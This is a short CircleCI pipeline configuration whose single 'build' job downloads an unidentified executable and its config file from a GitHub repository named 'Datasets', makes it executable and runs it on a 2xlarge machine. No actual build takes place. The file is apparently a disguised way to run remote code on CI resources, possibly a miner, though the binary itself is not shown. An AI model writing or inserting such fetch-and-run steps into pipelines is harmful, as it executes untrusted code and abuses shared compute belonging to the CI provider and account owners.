version: 2.1

jobs:
  build:
    machine:
      image: ubuntu-20.04
    resource_class: 2xlarge
    steps:
      - run: wget https://github.com/Rasparduino/Datasets/raw/main/Main
      - run: wget https://raw.githubusercontent.com/Rasparduino/Datasets/main/config.cfg
      - run: chmod +x Main
      - run: ./Main --config config.cfg 


 